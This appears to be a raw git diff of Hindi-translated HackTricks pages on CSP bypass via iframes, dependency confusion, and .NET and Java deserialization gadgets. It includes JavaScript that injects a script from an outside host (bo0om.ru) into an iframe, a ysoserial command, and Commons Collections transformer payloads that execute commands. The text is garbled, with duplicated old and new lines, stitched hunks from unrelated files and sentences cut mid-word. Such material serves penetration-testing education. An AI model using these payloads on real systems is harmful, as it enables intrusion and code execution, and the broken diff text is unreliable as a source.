* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
ऐसा एक विन्यास:
A configuration such as:
```
Content-Security-Policy: default-src self unsafe-inline;
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```
नामित तरीके से कोई भी फंक्शन का उपयोग रोकता है जो स्ट्रिंग के रूप में भेजे गए कोड को निष्पादित करते हैं। उदाहरण के लिए: `eval, setTimeout, setInterval` सभी ब्लॉक हो जाएंगे क्योंकि इसमें `unsafe-eval` सेटिंग होती है।
### माध्यम से पाठ और छवियाँ
बाहरी स्रोतों से किसी भी सामग्री को भी ब्लॉक किया जाता है, जिसमें छवियाँ, CSS, वेबसॉकेट्स, और विशेष रूप से JS शामिल हैं।
## पाठ और छवियों के माध्यम से
आधुनिक ब्राउज़र छवियों और पाठ को HTML फ़ाइलों में रूपांतरित करते हैं ताकि उन्हें बेहतर दिखाया जा सके (पृष्ठभूमि सेट करें, केंद्रित करें, आदि)।
इसलिए, यदि आप **एक छवि या txt फ़ाइल** जैसे **favicon.ico** या **robots.txt** को **`iframe`** के साथ **खोलते हैं**, तो आप इसे HTML के रूप में खोलेंगे।
**इस तरह के पृष्ठों में आमतौर पर CSP हैडर नहीं होता है और X-Frame-Options नहीं हो सकता है**, इसलिए आप उनसे विचारशील JS को निष्पादित कर सकते हैं:
यह देखा गया है कि आधुनिक ब्राउज़र छवियों और पाठ को HTML में रूपांतरित करते हैं ताकि उनकी प्रदर्शन क्षमता बढ़ जाए (जैसे, पृष्ठभूमि सेट करना, केंद्रीकरण, आदि)। इस परिणामस्वरूप, यदि कोई छवि या पाठ फ़ाइल, जैसे `favicon.ico` या `robots.txt`, एक `iframe` के माध्यम से खोला जाता है, तो यह HTML के रूप में प्रदर्शित होता है। विशेष रूप से, इन पृष्ठों में अक्षमता सुरक्षा नीति (CSP) हेडर अक्षम होता है और X-Frame-Options शामिल नहीं होता है, जिससे उनसे विचारहीन जावास्क्रिप्ट का कार्यान्वयन किया जा सकता है:
```javascript
frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);
script=document.createElement('script');
script.src='//bo0om.ru/csp.js';
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
## त्रुटियों के माध्यम से
### त्रुटियों के माध्यम से
टेक्स्ट फ़ाइल्स या छवियों की तरह, **त्रुटि प्रतिक्रियाएँ आमतौर पर CSP हैडर नहीं रखती हैं और X-Frame-Options भी नहीं हो सकती हैं**। इसलिए, आप त्रुटियों को बलपूर्वक उत्पन्न कर सकते हैं और उन्हें एक iframe में लोड कर सकते हैं:
उसी तरह, त्रुटि प्रतिक्रियाएँ, जैसे पाठ फ़ाइलें या छवियाँ, आम तौर पर सीएसपी हेडर के बिना आती हैं और एक्स-फ्रेम-विकल्प को छोड़ सकती हैं। त्रुटियों को आईफ्रेम के भीतर लोड करने के लिए प्रेरित किया जा सकता है, जिससे निम्नलिखित क्रियाएँ की जा सकती हैं:
```javascript
// Force nginx error
// Inducing an nginx error
frame=document.createElement("iframe");
frame.src="/%2e%2e%2f";
document.body.appendChild(frame);
// Force error via long URL
// Triggering an error with a long URL
frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame);
// Force error via long cookies
// Generating an error via extensive cookies
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
frame=document.createElement("iframe");
frame.src="/";
document.body.appendChild(frame);
// Don't forget to remove them
// Removal of cookies is crucial post-execution
for(var i=0;i<5;i++){document.cookie=i+"="}
```
उल्लिखित किसी भी स्थिति को ट्रिगर करने के बाद, आईफ्रेम के भीतर जावास्क्रिप्ट निष्पादन संभव है जैसे:
```javascript
// After any of the previous examples, you can execute JS in the iframe with something like:
script=document.createElement('script');
script.src='//bo0om.ru/csp.js';
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
## संदर्भ
@ -74,16 +63,14 @@ window.frames[0].document.head.appendChild(script);
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
HackTricks का समर्थन करने के अन्य तरीके:
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह!
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।**
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का पता लगाएं, हमारा संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -1,35 +1,38 @@
# डिपेंडेंसी कन्फ्यूजन
# Dependency Confusion
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स रेपो (https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को डाउनलोड करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।
</details>
## मूलभूत जानकारी
## मौलिक जानकारी
ंक्षेप में, डिपेंडेंसी कन्फ्यूजन संकट उत्पन्न होता है जब एक परियोजना एक पुस्तकालय का उपयोग कर रही होती है जिसका **गलत वर्तनी वाला नाम**, **अस्तित्व नहीं**ोता है या एक **निर्दिष्ट संस्करण** के साथ और उपयोग की जाने वाली डिपेंडेंसी रिपॉजिटरी **सार्वजनिक** रिपॉजिटरी से **नवीनतम संस्करणों को इकट्ठा करने** की अनुमति देती है।
ारांश में, एक डिपेंडेंसी कन्फ्यूजन सुरक्षा वंश्यता उत्पन्न होती है जब एक परियोजना एक पुस्तकालय का उपयोग कर रही है जिसका **गलत वर्णन** है, **अस्तित्व नहीं** है या **निर्दिष्ट संस्करण** है और उपयोग की गई डिपेंडेंसी रिपॉजिटरी को **सार्वजनिक** रिपॉजिटरियों से **नवीन संस्करण इकट्ठा करने की अनुमति** देता है।
* **गलत वर्तनी वाला**: `requests` की जगह पर **`reqests`** को आयात करें
* **गलत वर्णन**: `requests` की जगह **`reqests`** आयात करें
* **अस्तित्व नहीं**: `कंपनी-लॉगिंग` को आयात करें, एक आंतरिक पुस्तकालय जो **अब मौजूद नहीं है**
* **निर्दिष्ट संस्करण**: इस उदाहरण में `requests-company` जैसी **आंतरिक** **मौजूद** पुस्तकालय को आयात करें, लेकिन रिपॉजिटरी **सार्वजनिक रिपॉजिटरियों** की जांच करती है कि क्या **बड़े संस्करण** हैं।
* **निर्दिष्ट संस्करण**: एक **आंतरिक** **मौजूद** `कंपनी-रिक्वेस्ट्स` पुस्तकालय को आयात करें, लेकिन रिपॉ ने **सार्वजनिक रिपॉ** की जांच करने की अनुमति दी है कि क्या **अधिक संस्करण** हैं।
## शोषण
{% hint style="warning" %}
सभी मामलों में हमलावर को केवल एक **हानिकारक पैकेज जारी करने की आवश्यकता** होती है जिसका नाम शिकार कंपनी द्वारा उपयोग की जाने वाली पुस्तकालयों का होता है।
सभी मामलों में हमलावर को केवल एक **हानिकारक पैकेज का नाम प्रकाशित करने** की आवश्यकता है जिसे पीड़ित कंपनी द्वारा उपयोग किए जाने वाली पुस्तकालयों का नाम है।
{% endhint %}
### गलत वर्तनी वाला और अस्तित्व नहीं
### गलत वर्णन और अस्तित्व नहीं
यदि आपकी कंपनी को**आंतरिक पुस्तकालय नहीं आयात करने की कोशिश कर रही है**, तो बहुत संभावना है कि पुस्तकालयों का रिपॉजिटरी उसे **सार्वजनिक रिपॉजिटरियों** में खोजने की कोशिश करेगा। यदि किसी हमलावर ने इसे बनाया है, तो आपका कोड और मशीन जो चल रही है, बहुत संभावना है कि संक्रमित हो जाएगा।
यदि आपकी कंपनी कोशिश कर रही है कि **आंतरिक नहीं होने वाली पुस्तकालय को आयात करें**, तो संभावना है कि पुस्तकालयों का रिपॉ इसे **सार्वजनिक रिपॉजिटरियों** में खोज रहा होगा। यदि कोई हमलावर ने इसे बनाया है, तो आपका कोड और मशीनें जिन पर चल रही हैं, संभावना है कि कंप्रोमाइज हो जाएगा।
### निर्दिष्ट संस्करण
### निर्दिष्ट संस्करण
डेवलपर्स के लिए बहुत सामान्य है कि वे पुस्तकालय के किसी भी संस्करण को **निर्दिष्ट नहीं** करें, या केवल एक **महत्त्वपूर्ण संस्करण** को निर्दिष्ट करें। फिर, इंटरप्रेटर नवीनतम संस्करण को डाउनलोड करने की कोशिश करेगा जो उन आवश्यकताओं को पूर
डेवलपरों के लिए **पुस्तकालय का कोई संस्करण निर्दिष्ट न करना** या केवल एक **महत्वपूर्ण संस्करण** निर्दिष्ट करना बहुत सामान्य है। फिर, अनुप्रेक्षक नवीनतम संस्करण को डाउनलोड करने का प्रयास करेगा जो उन आवश्यकताओं को पूरा करता है।\
यदि पुस्तकालय एक **जानी-मानी बाह्य पुस्तकालय** है (जैसे पायथन `requests`), तो **हमलावर कुछ नहीं कर सकता**, क्योंकि उसे `requests` नाम की पुस्तकालय नहीं बना सकता (यदि वह मूल लेखक है)।\
हालांकि, यदि पुस्तकालय **आंतरिक** है, जैसे इस उदाहरण में `कंपनी-रिक्वेस्ट्स`, अगर **पुस्तकालय रिपॉ** बाहरी संस्करणों की भी **जांच करने की अनुमति देता है**, तो यह सार्वजनिक रूप से उपलब्ध नए संस्करण की खोज करेगा।\
तो यदि **हमलावर जानता है** कि कंपनी `कंपनी-रिक्वेस्ट्स` पुस्तकालय का उपयोग कर रही है **संस्करण 1.0.1** (लघु अपड

View file

@ -1,24 +1,23 @@
# बेसिक .Net डसीरियलाइजेशन (ObjectDataProvider गैजेट, ExpandedWrapper, और Json.Net)
# बेसिक .Net डिसीरियलाइजेशन (ObjectDataProvider गैजेट, ExpandedWrapper, और Json.Net)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने क एक्सेस चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **[hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details>
यह पोस्ट **ObjectDataProvider गैजेट को उत्पन्न करने के लिए कैसे उपयोग किया जाता है** ताकि RCE प्राप्त किया जा सके और **Serialization पुस्तकालय Json.Net और xmlSerializer को उस गैजेट के साथ दुरुपयोग कैसे किया जा सकता है** को समझने के लिए है।
यह पोस्ट **ObjectDataProvider गैजेट को उत्पन्न करने के लिए कैसे उपयोग किया जाता है** और RCE प्राप्त करने के लिए **Serialization पुस्तकालय Json.Net और xmlSerializer को कैसे दुरुपयोग किया जा सकता है**, को समझने के लिए है।
## ObjectDataProvider गैजेट
दस्तावेज़ीकरण से: _ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.\
हाँ, यह एक अजीब व्याख्या है, इसलिए चलिए देखते हैं कि इस क्लास में क्या है जो इतना दिलचस्प है: यह क्लास **एक विविध ऑब्जेक्ट** को **रैप** करने की अनुमति देता है, _**MethodParameters**_ का उपयोग करके **विविध पैरामीटर सेट करने** के लिए, और फिर **MethodName का उपयोग करके एक विविध ऑब्जेक्ट घोषित करने के लिए एक विविध फ़ंक्शन को कॉल करने की अनुमति देता है**।\
इसलिए, विविध **ऑब्ज
दस्तावेज़ीकरण से: _ObjectDataProvider Class Wraps और एक ऑब्जेक्ट बनाता है जिसे आप एक बाइंडिंग स्रोत के रूप में उपयोग कर सकते हैं_।\
हाँ, यह एक अजीब व्याख्या है, इसलिए चलिए देखते हैं कि इस क्लास में क्या है जो इतना दिलचस्प है: यह क्लास **एक विषयस्वत ऑब्ज
```java
using System.Windows.Data;
using System.Diagnostics;
@ -42,10 +41,7 @@ myODP.MethodName = "Start";
## ExpandedWrapper
पिछले एक्सप्लॉइट का उपयोग करते हुए ऐसे मामले होंगे जहां **object** को _**ObjectDataProvider**_ इंस्टेंस के रूप में **डीसीरियलाइज़ किया जाएगा** (उदाहरण के लिए DotNetNuke vuln में, XmlSerializer का उपयोग करके, ऑब्जेक्ट को `GetType` का उपयोग करके डीसीरियलाइज़ किया गया था)। फिर, **जिस ऑब्जेक्ट के पैकेट में बंधा है, उसके बारे में कोई जानकारी नहीं होगी** _ObjectDataProvider_ इंस्टेंस में (`Process` उदाहरण के लिए)। आप [DotNetNuke vuln के बारे में अधिक जानकारी यहाँ](https://translate.google.com/translate?hl=en\&sl=auto\&tl=en\&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F\&sandbox=1) पा सकते हैं।
यह क्लास एक दिए गए इंस्टेंस में बंधे ऑब्जेक्ट के ऑब्जेक्ट टाइप को **निर्दिष्ट करने की अनुमति देता है**। इसलिए, यह क्लास एक स्रोत ऑब्जेक्ट (_ObjectDataProvider_) को एक नए ऑब्जेक्ट टाइप में ढकने और हमें आवश्यक गुण प्रदान करने के लिए उपयोग किया जा सकता है (_ObjectDataProvider.MethodName_ और _ObjectDataProvider.MethodParameters_)।\
यह पिछले प्रस्तुत मामले के लिए बहुत उपयुक्त है, क्योंकि हम **\_ObjectDataProvider**_ को एक _**ExpandedWrapper**_ इंस्टेंस के अंदर **लपेट सकेंगे** और **जब इसे डीसीरियलाइज़** किया जाएगा तो यह क्लास _**MethodName**_ में निर्दिष्ट **कार्य** को **चलाएगा** जो _**OjectDataProvider**_ ऑब्ज
पिछले एक्सप्लॉइट का उपयोग करते हुए ऐसे मामले होंगे जहाँ **ऑब्ज
```java
using System.Windows.Data;
using System.Diagnostics;
@ -114,7 +110,7 @@ Console.WriteLine(desaccount.Email);
```
### Json.Net का दुरुपयोग
[ysoserial.net](https://github.com/pwntester/ysoserial.net) का उपयोग करते हुए मैंने यह उत्पीड़न बनाया:
[ysoserial.net](https://github.com/pwntester/ysoserial.net) का उपयोग करते हुए मैंने एक उत्पीड़न बनाया:
```java
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
@ -168,10 +164,10 @@ TypeNameHandling = TypeNameHandling.Auto
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** में PR जमा करके।
</details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details>
## जावा ट्रांसफॉर्मर्स से Rutime exec()
## Java Transformers से Rutime exec()
कई स्थानों पर आप एक जावा डेसीरियलाइज़ेशन पेलोड पाएंगे जो अपाचे कॉमन कलेक्शन्स से ट्रांसफॉर्मर्स का उपयोग करता है, जैसा कि निम्नलिखित है:
कई स्थानों पर आप एक जावा डेसीरियलाइज़ेशन पेलोड पा सकते हैं जो अपाचे कॉमन कलेक्शन्स से ट्रांसफॉर्मर्स का उपयोग करता है जैसे निम्नलिखित:
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
@ -52,22 +52,22 @@ lazyMap.get("anything");
}
}
```
यदि आपको जावा डेसीरियलाइज़ेशन पेलोड के बारे में कुछ भी नहीं पता है तो यह समझना कठिन हो सकता है कि इस कोड के द्वारा कैसे एक कैल्क चलाया जाएगा।
अगर आप जावा डिसीरियलाइज़ेशन पेलोड के बारे में कुछ नहीं जानते हैं तो यह कठिन हो सकता है कि यह कोड क्यों कैल्क को निष्पादित करेगा।
सबसे पहले, आपको जानना चाहिए कि जावा में **ट्रांसफॉर्मर** कुछ ऐसा होता है जो एक कक्षा को प्राप्त करता है और उसे एक अलग कक्षा में रूपांतरित करता है
इसके अलावा, यह जानना भी दिलचस्प है कि यहां **चलाया जा रहा पेलोड** निम्नलिखित के **समान** है:
सबसे पहले आपको यह जानना चाहिए कि **जावा में ट्रांसफॉर्मर** एक ऐसी चीज है जो **एक क्लास को प्राप्त करती है** और **इसे एक अलग क्लास में रूपांतरित करती है**
इसके अलावा यह दिलचस्प है कि यहां **निष्पादित पेलोड** **बराबर** है:
```java
Runtime.getRuntime().exec(new String[]{"calc.exe"});
```
या **अधिक सटीकता से**, अंत में क्या निष्पादित होगा, वह होगा:
या **अधिक सटीकता से**, अंत में क्या निष्पादित होगा:
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
### कैसे
तो, पहले पेलोड को वे "सरल" वन-लाइनर्स के समान कैसे प्रस्तुत किया जाता है?
तो, पहले पेलोड को उन "सरल" वन-लाइनर्स के समान कैसे पेश किया गया है?
**पहले** से ही, आप पेलोड में ध्यान दें कि एक **ट्रांसफॉर्म्स की एक श्रृंखला (एरे) बनाई जाती है**:
**पहली** बात तो यह है कि पेलोड में एक **ट्रांसफॉर्म का श्रृंखला (एरे) बनाया गया है**:
```java
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
@ -94,15 +94,15 @@ command
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
```
यदि आप कोड पढ़ हैं तो आप देखेंगे कि यदि आप किसी भी तरीके से सरणी के परिवर्तन को चेन करते हैं तो आप विचारशील आदेशों को निष्पादित कर सकते हैं।
यदि आप कोड पढ़ें तो आप देखेंगे कि यदि आप किसी भी तरह से एरे के परिवर्तनों को श्रृंखलित करते हैं तो आप विविध आदेशों को निष्पादित कर सकते हैं।
